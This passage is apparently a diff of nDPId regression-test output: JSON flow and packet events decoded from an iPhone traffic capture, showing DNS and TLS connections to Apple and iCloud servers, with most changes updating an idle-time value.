+00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1582454598412,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598412,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADUGSmlfZRk1wKgCEQG7xZCMPaCSoKaYqKBScSBNPAAAAgQFrAQCCAoi0AShEd\/nTAEDAwc="} 
00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"iphone.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1582454598412,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1582454598412,"pkt":"xGGLNYKpxiwDYGpkCABFAADIRW8AAEARr1PAqAIBwKgCEQA12KEAtAJjFxuBgAABAAUAAAAABG1lc3UFYXBwbGUDY29tAAABAAHADAAFAAEAAAfrAB8IbWVzdS1jZG4FYXBwbGUDY29tBmFrYWRucwNuZXQAwCwABQABAAAMoAAYCG1lc3UtY2RuDG9yaWdpbi1hcHBsZcA7wFcABQABAAAARAARBG1lc3UBZwdhYXBsaW1nwBfAewABAAEAAAAPAAQR\/WnKwHsAAQABAAAADwAEEf01yw=="} 00778{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":70,"source":"iphone.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598373,"flow_last_seen":1582454598412,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1582454598412,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":55457,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"mesu.apple.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.253.105.202"}} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1582454598413,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598413,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAG\/3DAqAIRX2UZNcWQAbugppiojD2gk4AQBAvpMwAAAQEIChHf524i0ASh"} 
-00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598377,"flow_last_seen":1582454598414,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598414,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.25.53","src_port":50576,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gspe35-ssl.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598416,"flow_last_seen":1582454598416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598416,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50578,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1582454598416,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598416,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAG\/DfAqAIREf1pysWSAbt\/OqmMAAAAALDC\/\/8OTwAAAgQFtAEDAwcBAQgKEd\/ndwAAAAAEAgAA"} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598418,"flow_last_seen":1582454598418,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598418,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50579,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1582454598418,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598418,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAG\/DfAqAIREf1pysWTAbsyJO8VAAAAALDC\/\/8V2QAAAgQFtAEDAwcBAQgKEd\/neQAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1582454598426,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598426,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADIGSjwR\/WnKwKgCEQBQwACbtSzNLJXrMqBScNC85AAAAgQFrAQCCAodNCSFEd\/nTQEDAwg="} 
-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1582454598427,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598427,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADIGslMRggIuwKgCEQG7xZHfrwWiGTrrGKBSqbCWRAAAAgQFrAQCCAq1T9HeEd\/nUwEDAw4="} -00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":78,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598377,"flow_last_seen":1582454598449,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598449,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.25.53","src_port":50576,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"gspe35-ssl.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1582454598453,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598453,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADIGSjwR\/WnKwKgCEQG7xZNpWNRgMiTvFqBScNC35wAAAgQFrAQCCAoAH8DDEd\/neQEDAwg="} 
-00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1582454598459,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598459,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADIGSjwR\/WnKwKgCEQG7xZLy+qnpfzqpjaBScNDegAAAAgQFrAQCCAqK\/qiVEd\/ndwEDAwg="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1582454598413,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598413,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAG\/3DAqAIRX2UZNcWQAbugppiojD2gk4AQBAvpMwAAAQEIChHf524i0ASh"} +00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598377,"flow_last_seen":1582454598414,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598414,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.25.53","src_port":50576,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gspe35-ssl.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598416,"flow_last_seen":1582454598416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598416,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50578,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1582454598416,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598416,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAG\/DfAqAIREf1pysWSAbt\/OqmMAAAAALDC\/\/8OTwAAAgQFtAEDAwcBAQgKEd\/ndwAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598418,"flow_last_seen":1582454598418,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598418,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50579,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1582454598418,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598418,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAG\/DfAqAIREf1pysWTAbsyJO8VAAAAALDC\/\/8V2QAAAgQFtAEDAwcBAQgKEd\/neQAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1582454598426,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598426,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADIGSjwR\/WnKwKgCEQBQwACbtSzNLJXrMqBScNC85AAAAgQFrAQCCAodNCSFEd\/nTQEDAwg="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1582454598427,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598427,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADIGslMRggIuwKgCEQG7xZHfrwWiGTrrGKBSqbCWRAAAAgQFrAQCCAq1T9HeEd\/nUwEDAw4="} 
+00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":78,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598377,"flow_last_seen":1582454598449,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598449,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.25.53","src_port":50576,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"gspe35-ssl.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1582454598453,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598453,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADIGSjwR\/WnKwKgCEQG7xZNpWNRgMiTvFqBScNC35wAAAgQFrAQCCAoAH8DDEd\/neQEDAwg="} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1582454598459,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598459,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADIGSjwR\/WnKwKgCEQG7xZLy+qnpfzqpjaBScNDegAAAAgQFrAQCCAqK\/qiVEd\/ndwEDAwg="} 
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"iphone.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598542,"flow_last_seen":1582454598542,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1582454598542,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52852,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"iphone.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1582454598542,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598542,"pkt":"xiwDYGpkxGGLNYKpCABFAABAIN8AAP8RFWvAqAIRwKgCAc50ADUALLvssQ8BAAABAAAAAAAAB2dhdGV3YXkGaWNsb3VkA2NvbQAAAQAB"} 00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"iphone.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598542,"flow_last_seen":1582454598542,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1582454598542,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52852,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"gateway.icloud.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
-00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1582454598544,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598544,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAG\/EPAqAIREf1pysAAAFAslesym7UszoAQCBZUCQAAAQEIChHf5+gdNCSF"} -00809{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598387,"flow_last_seen":1582454598545,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":131,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454598545,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":49152,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Apple","breed":"Safe","category":"ConnCheck"},"http": {"hostname":"captive.apple.com","url":"captive.apple.com\/hotspot-detect.html","code":0,"content_type":"","user_agent":"CaptiveNetworkSupport-390.60.1 wispr"}} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1582454598545,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598545,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGZFvAqAIREYICLsWRAbsZOusY368Fo4AQBAtqWAAAAQEIChHf5\/C1T9He"} 
-00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598385,"flow_last_seen":1582454598545,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598545,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.130.2.46","src_port":50577,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsp85-ssl.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1582454598546,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598546,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAG\/EPAqAIREf1pysWTAbsyJO8WaVjUYYAQBAtTNAAAAQEIChHf5\/cAH8DD"} -00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":96,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598418,"flow_last_seen":1582454598546,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598546,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50579,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mesu.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1582454598546,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598546,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAG\/EPAqAIREf1pysWSAbt\/OqmN8vqp6oAQBAt5ywAAAQEIChHf5\/eK\/qiV"} -00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":98,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598416,"flow_last_seen":1582454598546,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598546,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50578,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mesu.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00978{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":102,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598252,"flow_last_seen":1582454598558,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598558,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-fmfmobile.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -03152{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1582454598252,"flow_last_seen":1582454598568,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6277,"flow_avg_l4_payload_len":627,"midstream":0,"thread_ts_msec":1582454598568,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"p26-fmfmobile.icloud.com","server_names":"p67-fmfmobile.icloud.com,p48-fmfmobile.icloud.com,p53-fmfmobile.icloud.com,p34-fmfmobile.icloud.com,p72-fmfmobile.icloud.com,fmfmobile.icloud.com,p08-fmfmobile.icloud.com,p12-fmfmobile.icloud.com,p02-fmfmobile.icloud.com,p29-fmfmobile.icloud.com,p52-fmfmobile.icloud.com,p26-fmfmobile.icloud.com,p06-fmfmobile.icloud.com,p97-fmfmobile.icloud.com,p41-fmfmobile.icloud.com,p40-fmfmobile.icloud.com,p18-fmfmobile.icloud.com,p55-fmfmobile.icloud.com,p70-fmfmobile.icloud.com,p32-fmfmobile.icloud.com,p69-fmfmobile.icloud.com,p17-fmfmobile.icloud.com,p13-fmfmobile.icloud.com,p38-fmfmobile.icloud.com,p11-fmfmobile.icloud.com,p21-fmfmobile.icloud.com,p27-fmfmobile.icloud.com,p42-fmfmobile.icloud.com,p37-fmfmobile.icloud.com,p56-fmfmobile.icloud.com,p50-fmfmobile.icloud.com,p58-fmfmobile.icloud.com,p39-fmfmobile.icloud.com,p45-fmfmobile.icloud.com,p49-fmfmobile.icloud.com,p68-fmfmobile.icloud.com,p10-fmfmobile.icloud.com,p22-fmfmobile.icloud.com,p07-fmfmobile.icloud.com,p25-fmfmobile.icloud.com,p20-fmfmobile.icloud.com,p71-fmfmobile.icloud.com,p05-fmfmobile.icloud.com,p98-fmfmobile.icloud.com,p66-fmfmobile.icloud.com,p15-fmfmobile.icloud.com,p16-fmfmobile.icloud.com,p44-fmfmobile.icloud.com,p04-fmfmobile.icloud.com,p09-fmfmobile.icloud.com,p23-fmfmobile.icloud.com,p61-fmfmobile.icloud.com,p30-fmfmobile.icloud.com,p46-fmfmobile.icloud.com,p60-fmfmobile.icloud.com,p43-fmfmobile.icloud.com,p57-fmfmobile.icloud.com,p14-fmfmobile.icloud.com,p03-fmfmobile.icloud.com,p36-fmfmobile.i